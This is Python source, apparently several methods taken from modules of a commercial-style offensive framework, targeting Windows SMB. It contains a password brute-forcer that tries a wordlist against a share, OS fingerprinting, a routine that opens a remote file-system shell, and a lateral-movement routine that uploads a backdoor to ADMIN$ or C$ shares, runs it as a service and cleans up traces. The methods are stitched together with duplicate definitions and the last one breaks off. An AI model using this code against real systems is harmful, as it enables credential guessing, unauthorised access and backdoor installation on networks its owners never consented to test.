def test(self):
"""
Connect to the target and spawn a vfs-shell if we get a connection
"""
self.getargs()
self.setInfo("%s attacking %s:%d (Covertness:%d) - running" %\
(NAME,self.host,self.port,self.covertness))
self.log("Using domain=%s user=%s, password %s" %
(self.domain, self.user, self.password))
smbobj = msrpc.SMB(self.host, port=self.port, getsock=self)
smbobj.covertness = self.covertness
smbobj.username = self.user
smbobj.password = self.password
smbobj.domain = self.domain
ret = smbobj.connect()
if not ret:
self.log("Could not connect to remote host: %s" % smbobj.errormsg)
return 0
self.log("Trying treeconnect_AndX on share %s" % self.filename)
ret = smbobj.treeconnect(self.filename)
if not ret:
self.log("Failed to connect to share!")
return 0
self.log("Connected to share %s" % self.filename)
smbobj.close()
return 1
def run(self):
self.getArgs()
self.log('%s running against %s:%s covertness: %d' %
(NAME, self.host, self.port, self.covertness))
self.setInfo('%s attacking %s:%s (Covertness:%d) - running' %
(NAME, self.host, self.port, self.covertness))
#self.log('Using user=%s, password=%s'%(self.user,self.password))
try:
passwords = file(self.filename).readlines()
except:
self.log('Failed to open password file %s' % (self.filename))
return 0
passwords.insert(0, self.user)
passwords.insert(0, '')
for password in passwords:
if self.state == self.HALT:
self.log('Halted')
return 0
password = password.strip()
smbobj = msrpc.SMB(self.host, getsock=self)
smbobj.covertness = self.covertness
smbobj.username = self.user
smbobj.password = password
ret = smbobj.connect()
if not ret:
self.log('Could not connect to remote host as "%s":"%s"' %
(self.user, password))
continue
self.log('Trying TreeConnect_AndX on share %s' % self.share)
ret = smbobj.treeconnect(self.share)
if not ret:
self.log('Failed to connect to share as "%s":"%s"!' %
(self.user, password))
continue
self.log('Connected to share %s with "%s":"%s"' %
(self.share, self.user, password))
self.log('Done with exploit')
self.setInfo(
'%s attacking %s:%d (Covertness:%d) - done (found:%s:%s)' %
(NAME, self.host, self.port, self.covertness, self.user,
password))
return 1
self.setInfo('%s attacking %s:%d (Covertness:%d) - done (failed)' %
(NAME, self.host, self.port, self.covertness))
return 0
def test(self):
self.getArgs()
self.log('%s running against %s:%s covertness: %d' %
(NAME, self.host, self.port, self.covertness))
self.setInfo('%s attacking %s:%s (Covertness:%d) - running' %
(NAME, self.host, self.port, self.covertness))
#self.log('Using user=%s, password=%s'%(self.user,self.password))
smbobj = msrpc.SMB(self.host, getsock=self)
smbobj.covertness = self.covertness
smbobj.username = self.user
smbobj.password = self.password
ret = smbobj.connect()
if not ret:
self.log('Could not connect to remote host')
return 0
self.log('Trying treeconnect_AndX on share %s' % (self.share))
ret = smbobj.treeconnect(self.share)
if not ret:
self.log('Failed to connect to share!')
return 0
self.log('Connected to share %s' % (self.share))
smbobj.close()
return 1
def do_smb(self):
""" do windows SMB detection """
result = None
self.log("SMB DETECT: Doing SMB OS Detection")
#set default port here
for port in [139, 445]:
smbobj = msrpc.SMB(self.host, port=port, getsock=self)
smbobj.covertness = self.covertness
smbobj.username = self.user
smbobj.password = self.password
ret = smbobj.connect()
self.log('SMB DETECT: SMB OS Detection (port=%d) returned %s' %
(port, smbobj.os))
if smbobj.lanman.lower() != 'unknown':
self.log("SMB DETECT: Adding lanman knowledge: %s" %
smbobj.lanman)
self.target.add_knowledge("Lanman", smbobj.lanman, 100)
self.log("SMB DETECT: Adding domain knowledge: %s" %
smbobj.domain)
self.target.add_knowledge("SMBDomain", smbobj.domain, 100)
self.log("SMB DETECT: Adding server knowledge: %s" %
smbobj.server)
self.target.add_knowledge("SMBServer", smbobj.server, 100)
break
# check native OS, assume Linux for SAMBA
if 'UNIX' in smbobj.os.upper():
#When you assume...
#if 'SAMBA' in smbobj.lanman.upper():
# self.log("SMB DETECT: found Unix SAMBA, assuming Linux OS")
# result = canvasos.new("Linux")
if 'SUSE' in smbobj.lanman.upper():
result = canvasos.new("Linux")
result.version = "SuSE"
# Windows SMB muck
elif 'VISTA' in smbobj.os.upper():
result = canvasos.new('Windows')
result.version = 'Vista'
for subversion in ['Ultimate']:
if smbobj.os.find(subversion) != -1:
result.family = subversion
elif 'LAN MANAGER 4.0' in smbobj.os.upper():
result = canvasos.new('Windows')
result.version = 'NT 4.0'
elif 'WINDOWS' in smbobj.os.upper():
result = canvasos.new('Windows')
if smbobj.os.find('Windows 5.0') != -1:
result.version = '2000'
elif smbobj.os.find('Windows 5.1') != -1:
result.version = 'XP'
elif smbobj.os.find('Windows .NET 5.2') != -1:
result.version = '.NET RC2'
elif smbobj.os.find('Windows NT 4.0') != -1:
result.version = 'NT'
elif smbobj.os.find('Windows 4.0') != -1:
result.version = '9x'
elif smbobj.os.find('Windows Server 2003') != -1:
result.version = '2003'
if smbobj.os.find('Service Pack 1') != -1:
result.servicepack.append('SP1')
elif smbobj.os.find('Service Pack 2') != -1:
result.servicepack.append('SP2')
else:
result.servicepack.append('SP0')
return result
def run(self):
"""
Connect to the target and spawn a vfs-shell if we get a connection
"""
self.result = []
self.getargs()
self.log("%s running against %s:%d covertness: %d" %\
(NAME,self.host,self.port,self.covertness))
self.setInfo("%s attacking %s:%d (Covertness:%d) - running" %\
(NAME,self.host,self.port,self.covertness))
self.log("Using domain=%s user=%s, password %s" %\
(self.domain,self.user,self.password))
smbobj = msrpc.SMB(self.host, port=self.port, getsock=self)
smbobj.covertness = self.covertness
smbobj.username = self.user
smbobj.password = self.password
smbobj.domain = self.domain
ret = smbobj.connect()
if not ret:
self.log("Could not connect to remote host: %s" % smbobj.errormsg)
if self.port != 445:
smbobj.port = 445
self.log("Attempting to try port 445.")
ret = smbobj.connect()
if not ret:
return 0
else:
return 0
self.log("Successfully connected to %s:%d" % (self.host, smbobj.port))
self.log("Trying treeconnect_AndX on share %s" % self.filename)
ret = smbobj.treeconnect(self.filename)
if not ret:
# Try again with port 445
if smbobj.port != 445:
smbobj.port = 445
ret = smbobj.connect()
if not ret:
return 0
else:
ret = smbobj.treeconnect(self.filename)
if not ret:
self.log("Failed to connect to share!")
return 0
else:
self.log("Failed to connect to share!")
return 0
self.log("Connected to share %s" % self.filename)
if not smbobj.checkdirectory("\\"):
self.log("Can't check directory on that share. :<")
else:
self.log("Checkdirectory \\ passed...")
node = VFSNode()
node.parentnode = self.argsDict["passednodes"][0]
newshell = smbshell(smbobj, node, self.logfunction)
self.setInfo("%s attacking %s:%d (Covertness:%d) - done" %\
(NAME,self.host,self.port,self.covertness))
self.result = [node]
return node
def run(self):
self.getargs()
self.maketrojan()
self.log('[D2] %s running against %s:%d covertness: %d' %
(NAME, self.host, self.port, self.covertness))
self.setInfo('[D2] %s attacking %s:%d (Covertness:%d) - running' %
(NAME, self.host, self.port, self.covertness))
listaccount = {}
if self.msrpcuser and self.msrpcpassword:
listaccount[self.msrpcuser] = self.msrpcpassword
if self.credentfile:
lines = open(self.credentfile, 'r').readlines()
for line in lines:
user, passwd = line[:-1].split(':')
listaccount[user] = passwd
for user, passwd in listaccount.items():
self.msrpcuser = user
self.msrpcpassword = passwd
self.smbobj = msrpc.SMB(self.host, port=self.port, getsock=self)
self.smbobj.covertness = self.covertness
self.smbobj.username = self.msrpcuser
self.smbobj.password = self.msrpcpassword
self.smbobj.domain = self.domain
ret = self.smbobj.connect()
if not ret:
continue
self.log('[D2] Using domain=%s user=%s, password=%s' %
(self.domain, self.msrpcuser, self.msrpcpassword))
sharelist = ["ADMIN$", "C$", "D$", "E$"]
shareenum = self.run_module('shareenum')
for share in shareenum:
name, desc = str(share).split(':')
if name not in sharelist:
sharelist.append(name)
self.log('[D2] Trying to log into %s file share' %
(', '.join(sharelist)))
for sharename in sharelist:
if not self.connect_to_share(sharename): continue
if not self.upload_backdoor(): continue
scm = self.create_service(sharename)
if scm == None:
continue
handler = self.open_service(scm)
if handler == None:
continue
self.start_service(handler)
time.sleep(10)
self.stop_service(handler)
self.delete_service(handler)
self.CloseServiceHandle(handler)
self.CloseServiceHandle(scm)
time.sleep(10)
os.unlink(self.srcbin)
self.delete_backdoor()
time.sleep(10)
self.myDCE.close()
self.smbobj.s.close()
self.log('[D2] Done with exploit')
self.setInfo('[D2] %s attacking %s:%d (Covertness:%d) - done' %
(NAME, self.host, self.port, self.covertness))
return 1
self.setInfo('[D2] %s attacking %s:%d (Covertness:%d) - failed' %
(NAME, self.host, self.port, self.covertness))